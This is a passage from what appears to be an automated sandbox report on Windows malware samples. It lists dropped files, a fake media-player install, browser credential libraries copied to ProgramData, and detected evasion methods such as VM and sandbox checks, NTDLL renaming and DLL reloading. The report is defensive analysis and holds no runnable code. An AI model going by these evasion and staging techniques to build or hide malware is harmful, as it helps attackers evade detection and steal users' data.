      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\librawdv_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\file3s[1].bmp
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\control\libnetsync_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libadummy_plugin.dll
      Source: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe File created: C:\Users\user\Documents\VlcpVideoV1.0.1\md8_8eus.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libhttps_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\spu\libaudiobargraph_v_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdirectory_demux_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libes_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdiracsys_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_vc1_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_asf_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libgme_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libsatip_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libnfs_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_stl_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe File created: C:\ProgramData\softokn3.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\app[1].bmp
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Users\user\AppData\Local\Temp\nsl5825.tmp\Dialer.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libmod_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_mms_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpc_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\msvcp140[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libpanoramix_plugin.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\nss3[2].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libdvdnav_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\nss3[1].dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\spu\libsubsdelay_plugin.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Users\user\AppData\Local\Temp\nsl5825.tmp\System.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsvorepository_plugin.dll
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe File created: C:\Users\user\AppData\Local\Temp\AE30.tmp
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegaudio_plugin.dll
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe File created: C:\Users\user\AppData\Local\Temp\axhub.dll
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe File created: C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe File created: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe File created: C:\ProgramData\mozglue.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe File created: C:\ProgramData\nss3.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe File created: C:\ProgramData\msvcp140.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe File created: C:\ProgramData\freebl3.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile created: C:\ProgramData\vcruntime140.dll
      Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exeFile created: C:\ProgramData\softokn3.dll
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\file3s[1].bmp
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\file3[1].bmp
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\app[1].bmp
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Lightening Media Player.lnk

      Hooking and other Techniques for Hiding and Protection:

      DLL reload attack detected
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe Module Loaded: Original DLL: C:\USERS\user\APPDATA\LOCAL\TEMP\AE30.TMP reload: C:\WINDOWS\SYSWOW64\NTDLL.DLL
      May modify the system service descriptor table (often done to hook functions)
      Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.782345580.0000000003C03000.00000004.00000001.sdmp Binary or memory string: KeServiceDescriptorTable
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Code function: 1_2_0124D030 GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetLastError,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
      Source: C:\Users\user\Desktop\yevbZfdCqR.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\jfiag3g_gg.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Browzar\Browzar.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Checks if the current machine is a virtual machine (disk enumeration)
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
      Renames NTDLL to bypass HIPS
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe File opened: C:\Windows\SysWOW64\ntdll.dll
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: KyTQCmNmjazMZrvIWzjrSsQG.exe, 00000013.00000003.742691059.00000000037E0000.00000004.00000001.sdmp :: Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDERWINDOWS 874[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONATTACK_TYPEBAD ADDRESSBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCOMPAIGN_IDCREATED BY CRYPT32.DLLDNSMESSAGE.E2.KEFF.ORGEMBEDDED/%SFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGETPEERNAMEGETSOCKNAMEHOST IS NILHTTPS_PROXYI/O TIMEOUTLOCAL ERRORLOST MCACHEMSPANMANUALMETHODARGS(MSWSOCK.DLLNEXT SERVERNIL CONTEXTNOTIFY-HOSTORANNIS.COMRAW-CONTROLREFLECT.SETRETRY-AFTERRUNTIME: P RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSECURE_BOOTSHELL32.DLLSHORT WRITETASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUPDATE-DATAUPLOAD-FILEUSERENV.DLLVERSION=179VM DETECTEDVMUSRVC.EXEWININET.DLLWUP_PROCESS (SENSITIVE) [RECOVERED] ALLOCCOUNT FOUND AT *( GCSCANDONE M->GSIGNAL= MINTRIGGER= NDATAROOTS= NSPANROOTS= PAGES/BYTE
Source: C:\Program Files (x86)\Browzar\Browzar.exe :: Memory allocated: 5A50000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Browzar\Browzar.exe :: Memory allocated: 8B10000 memory commit | memory reserve | memory write watch
Source: C:\Program Files (x86)\Browzar\Browzar.exe :: Memory allocated: 9010000 memory commit | memory reserve | memory write watch
Source: C:\Program Files (x86)\Browzar\Browzar.exe :: Memory allocated: 9070000 memory commit | memory reserve | memory write watch
Source: C:\Program Files (x86)\Browzar\Browzar.exe :: Memory allocated: 90D0000 memory commit | memory reserve | memory write watch
Source: C:\Program Files (x86)\Browzar\Browzar.exe :: Memory allocated: 9130000 memory commit | memory reserve | memory write watch
Source: C:\Program Files (x86)\Browzar\Browzar.exe :: Memory allocated: 91F0000 memory commit | memory reserve | memory write watch
Source: C:\Program Files (x86)\Browzar\Browzar.exe :: Memory allocated: 9270000 memory commit | memory reserve | memory write watch
Source: C:\Program Files (x86)\Browzar\Browzar.exe :: Memory allocated: 92D0000 memory reserve | memory write watch
Source: C:\Program Files (x86)\Browzar\Browzar.exe :: Memory allocated: AD20000 memory commit | memory reserve | memory write watch
Source: C:\Program Files (x86)\Browzar\Browzar.exe :: Memory allocated: B970000 memory commit | memory reserve | memory write watch
Source: C:\Program Files (x86)\Browzar\Browzar.exe :: Memory allocated: B990000 memory commit | memory reserve | memory write watch
Source: C:\Program Files (x86)\Browzar\Browzar.exe :: Memory allocated: B9B0000 memory commit | memory reserve | memory write watch
Source: C:\Program Files (x86)\Browzar\Browzar.exe :: Memory allocated: B9D0000 memory commit | memory reserve | memory write watch
Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe :: Code function: 4_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe :: Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libflacsys_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libaiff_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\keystore\libfile_keystore_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll
Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\freebl3[1].dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwasapi_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_flac_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\lighteningplayer.exe
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libmjpeg_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\control\liboldrc_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\spu\librss_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mlp_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll
Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe :: Dropped PE file which has not been started: C:\ProgramData\nss3.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\logger\libfile_logger_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\connection.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\spu\libmarq_plugin.dll
Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\Browzar\Uninstall.exe
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\misc\libfingerprinter_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemuxdump_plugin.dll
Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exe :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\install.dll
Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\msvcp140[1].dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_dummy_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsfsstorage_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_copy_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\control\libdummy_plugin.dll
Source: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\mozglue[1].dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll
Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\softokn3[1].dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\spu\liblogo_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\data_load.exe
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\control\libhotkeys_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libsmf_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\d3d11\libdirect3d11_filters_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll
Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe :: Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\librawdv_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\libvlccore.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\control\libnetsync_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\librtp_plugin.dll
Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exe :: Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Newtonsoft.Json.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\demux\libau_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libadummy_plugin.dll
Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe :: Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\misc\libexport_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\access\libhttps_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll
Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe :: Dropped PE file which has not been started: C:\Program Files (x86)\lighteningplayer\plugins\spu\libaudiobargraph_v_plugin.dll
